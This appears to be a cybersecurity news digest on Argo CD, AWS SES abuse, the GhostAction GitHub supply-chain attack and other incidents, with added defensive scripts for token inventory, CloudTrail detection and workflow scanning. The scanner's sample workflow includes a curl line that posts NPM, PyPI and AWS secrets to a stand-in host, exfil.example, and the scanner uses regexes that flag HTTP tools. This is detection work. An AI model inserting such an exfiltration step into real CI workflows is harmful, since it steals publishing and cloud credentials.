Cyber Digests

no noise - just real cyber news

A critical vulnerability in Argo CD lets a low-privileged API token retrieve every repository credential associated with a project, bypassing project isolation: a token holding nothing more than 'get' permission can read the stored usernames and passwords. An attacker with such a token can clone private codebases, inject malicious manifests, and mount supply chain attacks. The issue affects all Argo CD versions up to 2.13.0.

Latest mentioned: 09-08
Earliest mentioned: 09-05
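Because the fix is an upgrade rather than an RBAC change, the practical follow-up is to rotate repository credentials and review which project-scoped API tokens exist and whether they ever expire. The script below is an added example, not Argo CD project code: it inventories issued project-role tokens from AppProject manifests in the shape `kubectl -n argocd get appproj -o json` returns. The sample manifests are constructed; the field locations (the deprecated `spec.roles[].jwtTokens` list and `status.jwtTokensByRole[<role>].items`, each entry carrying `iat` and optional `exp`/`id`) are Argo CD's own.

```python
"""Inventory issued Argo CD project-role API tokens from AppProject manifests.

Added example, not Argo CD project code. Input has the shape of
`kubectl -n argocd get appproj -o json`; the sample below is constructed.
Issued tokens are recorded in the deprecated spec.roles[].jwtTokens list and
in status.jwtTokensByRole[<role>].items, each as {id?, iat, exp?} with Unix
timestamps.
"""
import json
import time

# Constructed sample: 'ci' has a non-expiring token plus a short-lived one,
# 'readonly' has never been issued a token, and 'dev' has only an expired one.
SAMPLE_APPPROJECTS = json.dumps({
    "apiVersion": "v1",
    "kind": "List",
    "items": [
        {
            "metadata": {"name": "payments", "namespace": "argocd"},
            "spec": {"roles": [
                {"name": "ci",
                 "policies": ["p, proj:payments:ci, applications, get, payments/*, allow"],
                 "jwtTokens": [{"id": "tok-1", "iat": 1700000000}]},
                {"name": "readonly",
                 "policies": ["p, proj:payments:readonly, applications, get, payments/*, allow"]},
            ]},
            "status": {"jwtTokensByRole": {"ci": {"items": [
                {"id": "tok-1", "iat": 1700000000},
                {"id": "tok-2", "iat": 1700000100, "exp": 1700000200},
            ]}}},
        },
        {
            "metadata": {"name": "sandbox", "namespace": "argocd"},
            "spec": {"roles": [{"name": "dev", "policies": []}]},
            "status": {"jwtTokensByRole": {"dev": {"items": [
                {"id": "tok-3", "iat": 1600000000, "exp": 1600086400},
            ]}}},
        },
    ],
})


def inventory_tokens(appproj_json, now=None):
    """One record per issued token. A token listed both in spec and status
    is reported once (deduplicated on project, role and token id)."""
    now = time.time() if now is None else now
    doc = json.loads(appproj_json)
    seen, records = set(), []
    for proj in doc.get("items", []):
        pname = proj["metadata"]["name"]
        found = []  # (role name, token) pairs gathered from both locations
        for role in proj.get("spec", {}).get("roles") or []:
            for tok in role.get("jwtTokens") or []:
                found.append((role["name"], tok))
        for rname, block in (proj.get("status", {}).get("jwtTokensByRole") or {}).items():
            for tok in block.get("items") or []:
                found.append((rname, tok))
        for rname, tok in found:
            key = (pname, rname, tok.get("id") or tok["iat"])
            if key in seen:
                continue
            seen.add(key)
            exp = tok.get("exp")
            records.append({
                "project": pname, "role": rname, "id": tok.get("id", ""),
                "issued_at": tok["iat"], "expires_at": exp,
                "expired": exp is not None and exp <= now,
            })
    return records


def live_tokens(appproj_json, now=None):
    """Tokens that can still authenticate; entries without 'exp' never expire."""
    return [r for r in inventory_tokens(appproj_json, now) if not r["expired"]]


if __name__ == "__main__":
    for rec in inventory_tokens(SAMPLE_APPPROJECTS):
        state = "expired" if rec["expired"] else ("no expiry" if rec["expires_at"] is None else "live")
        print(f"{rec['project']}/{rec['role']} {rec['id'] or rec['issued_at']} ({state})")
```

Run it against the live cluster output instead of the sample, then treat every "no expiry" token as a candidate for deletion and re-issue with an expiry once the upgrade is in place.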

The Czech National Cyber and Information Security Agency (NÚKIB) issued a formal warning about products and services that transfer user and system data to China, citing Chinese legal frameworks that compel companies to share data with the state; a vendor's remote administration access to such products is therefore exposed to potential misuse by state interests. Threat intelligence indicates a significant rise in intrusion activity and cloud targeting by Chinese operations, underscoring the supply chain risk.

Latest mentioned: 09-08
Earliest mentioned: 09-04

A supply-chain attack on Salesloft Drift led to a data breach at Zscaler: attackers used stolen OAuth tokens for the Drift integration to access Salesforce environments and expose customer information, a reminder of how persistent and adaptable these threat actors are. The breach underscores the need to secure API tokens and third-party OAuth integrations, and to stay vigilant against the phishing and social engineering that typically follow such exposure.

A recent phishing campaign used compromised AWS access keys to weaponize Amazon Simple Email Service (SES) for industrial-scale email delivery. New SES accounts start in a sandbox with tight sending restrictions; the attackers bypassed those defaults by calling the `PutAccountDetails` API to push the accounts into production mode. The campaign ran entirely through programmatic API calls and included attempted privilege escalation, pointing to automated, sophisticated tradecraft.

Latest mentioned: 09-08
Earliest mentioned: 09-04
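The defender's hook here is CloudTrail: a `PutAccountDetails` call that requests production access is rare in normal operations, and the same access key's surrounding activity (SES setup calls, denied IAM calls) tells you whether you are looking at a developer or an automated abuse chain. The detection below is an added example, not from the original report. It assumes SESv2 calls appear under `eventSource` `ses.amazonaws.com` with request parameters named after the SESv2 API fields (`productionAccessEnabled`, `mailType`, `websiteURL`); the sample records are constructed, and the list of IAM calls treated as escalation indicators is this example's own choice.

```python
"""Flag CloudTrail events in which an access key pushes Amazon SES out of the
sandbox, then summarise what else that key did.

Added example, not from the original report. SESv2 calls appear in CloudTrail
under eventSource "ses.amazonaws.com"; the request parameter names used here
(productionAccessEnabled, mailType, websiteURL) follow the SESv2
PutAccountDetails request shape, and the sample records are constructed.
IAM_ESCALATION_CALLS is this example's own list of escalation indicators.
"""
import json

SES_SETUP_CALLS = {"GetAccount", "PutAccountDetails", "CreateEmailIdentity",
                   "PutAccountSendingAttributes", "CreateConfigurationSet"}
IAM_ESCALATION_CALLS = {"CreateUser", "CreateAccessKey", "AttachUserPolicy",
                        "PutUserPolicy", "CreateLoginProfile", "UpdateAssumeRolePolicy"}

# Constructed sample CloudTrail records, one JSON object per line.
SAMPLE_EVENTS = """\
{"eventTime":"2025-09-03T10:01:00Z","eventSource":"sts.amazonaws.com","eventName":"GetCallerIdentity","userIdentity":{"type":"IAMUser","userName":"deploy","accessKeyId":"AKIAEXAMPLE000000001"},"sourceIPAddress":"203.0.113.10"}
{"eventTime":"2025-09-03T10:01:04Z","eventSource":"ses.amazonaws.com","eventName":"GetAccount","userIdentity":{"type":"IAMUser","userName":"deploy","accessKeyId":"AKIAEXAMPLE000000001"},"sourceIPAddress":"203.0.113.10"}
{"eventTime":"2025-09-03T10:01:09Z","eventSource":"ses.amazonaws.com","eventName":"PutAccountDetails","userIdentity":{"type":"IAMUser","userName":"deploy","accessKeyId":"AKIAEXAMPLE000000001"},"sourceIPAddress":"203.0.113.10","requestParameters":{"productionAccessEnabled":true,"mailType":"TRANSACTIONAL","websiteURL":"https://example.test","useCaseDescription":"notifications"}}
{"eventTime":"2025-09-03T10:01:20Z","eventSource":"iam.amazonaws.com","eventName":"CreateUser","userIdentity":{"type":"IAMUser","userName":"deploy","accessKeyId":"AKIAEXAMPLE000000001"},"sourceIPAddress":"203.0.113.10","errorCode":"AccessDenied"}
{"eventTime":"2025-09-03T11:30:00Z","eventSource":"ses.amazonaws.com","eventName":"SendEmail","userIdentity":{"type":"AssumedRole","accessKeyId":"ASIAEXAMPLE000000002"},"sourceIPAddress":"10.0.0.5"}
"""


def parse_events(text):
    """Parse newline-delimited CloudTrail records."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def key_of(event):
    return event.get("userIdentity", {}).get("accessKeyId", "unknown")


def detect_ses_production_push(events):
    """PutAccountDetails calls that explicitly request production access."""
    hits = []
    for ev in events:
        if ev.get("eventSource") != "ses.amazonaws.com" or ev.get("eventName") != "PutAccountDetails":
            continue
        params = ev.get("requestParameters") or {}
        if params.get("productionAccessEnabled") is True:
            hits.append({"time": ev["eventTime"], "accessKeyId": key_of(ev),
                         "sourceIPAddress": ev.get("sourceIPAddress"),
                         "mailType": params.get("mailType"),
                         "websiteURL": params.get("websiteURL")})
    return hits


def key_activity(events, access_key):
    """Everything the same access key did, split into SES setup calls,
    IAM escalation attempts (denied or not) and the rest."""
    summary = {"ses_setup": [], "iam_attempts": [], "other": []}
    for ev in events:
        if key_of(ev) != access_key:
            continue
        name, src = ev.get("eventName"), ev.get("eventSource")
        entry = {"time": ev["eventTime"], "event": name,
                 "denied": ev.get("errorCode") == "AccessDenied"}
        if src == "ses.amazonaws.com" and name in SES_SETUP_CALLS:
            summary["ses_setup"].append(entry)
        elif src == "iam.amazonaws.com" and name in IAM_ESCALATION_CALLS:
            summary["iam_attempts"].append(entry)
        else:
            summary["other"].append(entry)
    return summary


def triage(text):
    """One report entry per production-access push, enriched with the
    offending key's SES setup sequence and IAM escalation attempts."""
    events = parse_events(text)
    report = []
    for hit in detect_ses_production_push(events):
        activity = key_activity(events, hit["accessKeyId"])
        hit["ses_setup_calls"] = [e["event"] for e in activity["ses_setup"]]
        hit["iam_attempts"] = [(e["event"], e["denied"]) for e in activity["iam_attempts"]]
        report.append(hit)
    return report


if __name__ == "__main__":
    for entry in triage(SAMPLE_EVENTS):
        print(json.dumps(entry, indent=2))
```

A denied `CreateUser` right after the SES setup sequence is the privilege-escalation attempt the report describes; an `AccessDenied` does not mean the key is safe, only that this particular path was closed. Rotate the key and check the other paths it did have.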

A widespread supply chain attack, dubbed 'GhostAction', compromised hundreds of GitHub repositories by injecting malicious workflow files that exfiltrated 3,325 CI/CD secrets, including package publishing tokens and cloud credentials; the stolen material was then used in attempts to access AWS environments and database services. The campaign affected 327 developers across 817 repositories, spanning projects in multiple programming languages and entire SDK portfolios.

Latest mentioned: 09-08
Earliest mentioned: 09-06
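The injected workflow's shape, many repository secrets pulled into one step and posted to a host outside GitHub, is easy to describe and worth scanning for across an organisation's `.github/workflows/` directories. The scanner below is an added example, not from the original report or from GitGuardian's analysis. The two workflows it runs on are constructed, and the host allow-list and secret-count threshold are this example's own choices to be tuned per organisation.

```python
"""Heuristic scan of GitHub Actions workflow files for the GhostAction pattern:
a step that gathers many repository secrets and posts them to an external host.

Added example, not from the original report. The two workflows below are
constructed; ALLOWED_HOSTS and SECRET_COUNT_THRESHOLD are this example's own
choices.
"""
import re

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
ALL_SECRETS = re.compile(r"toJSON\(\s*secrets\s*\)")      # dumps every secret at once
HTTP_TOOL = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")
ALLOWED_HOSTS = ("github.com", "githubusercontent.com", "githubapp.com")
SECRET_COUNT_THRESHOLD = 5  # more distinct secrets than this in one file warrants review


def host_allowed(host):
    host = host.lower()
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)


def scan_workflow(text):
    """Return the secrets referenced, the non-allow-listed hosts contacted from
    lines that invoke an HTTP client, and a risk verdict."""
    secrets = set(SECRET_REF.findall(text))
    dumps_all = bool(ALL_SECRETS.search(text))
    targets = set()
    for line in text.splitlines():
        if not HTTP_TOOL.search(line):
            continue
        for host in URL_HOST.findall(line):
            if not host_allowed(host):
                targets.add(host.lower())
    if (secrets or dumps_all) and targets:
        risk = "high"      # secrets in scope plus an outbound call to an unknown host
    elif dumps_all or len(secrets) > SECRET_COUNT_THRESHOLD or targets:
        risk = "review"
    else:
        risk = "low"
    return {"secrets": sorted(secrets), "dumps_all_secrets": dumps_all,
            "external_hosts": sorted(targets), "risk": risk}


# Constructed workflow resembling the exfiltration pattern.
MALICIOUS_WORKFLOW = """\
name: Build
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Prepare
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
          PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        run: |
          curl -s -X POST -d "npm=$NPM_TOKEN&pypi=$PYPI_TOKEN&aws=$AWS_ACCESS_KEY_ID:$AWS_SECRET_ACCESS_KEY" https://exfil.example/collect
"""

# Constructed benign workflow: one publishing token, one call to the GitHub API.
BENIGN_WORKFLOW = """\
name: Release
on:
  push:
    tags: ['v*']
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
      - run: curl -sSf -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" https://api.github.com/repos/${{ github.repository }}/releases
"""

if __name__ == "__main__":
    for label, wf in (("malicious", MALICIOUS_WORKFLOW), ("benign", BENIGN_WORKFLOW)):
        print(label, scan_workflow(wf))
```

The scan is line-based on purpose: it needs no YAML parser, so it runs in a pre-receive hook or a scheduled audit job with nothing but the standard library. Its blind spots are exfiltration via a checked-in script or a third-party action, which is why a "review" verdict on a workflow that references many secrets should still be read by a human.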

A newly identified APT group, Noisy Bear, is running a highly targeted campaign against Kazakhstan's energy sector, combining social engineering with a multi-stage infection chain built from open-source offensive tools and infrastructure hosted by a sanctioned Russian provider. The group sends spear-phishing emails from compromised internal accounts to deliver malicious LNK files, which ultimately inject Meterpreter shellcode.

Latest mentioned: 09-08
Earliest mentioned: 09-04

A zero-day vulnerability in the WhatsApp iOS and macOS clients was exploited in a zero-click attack chain that delivered spyware without any user interaction; security experts recommend updating immediately and, for targeted users, performing a full device reset. The attack is part of a rising trend in which advanced threat actors chain multiple zero-day vulnerabilities to evade security controls and compromise devices.
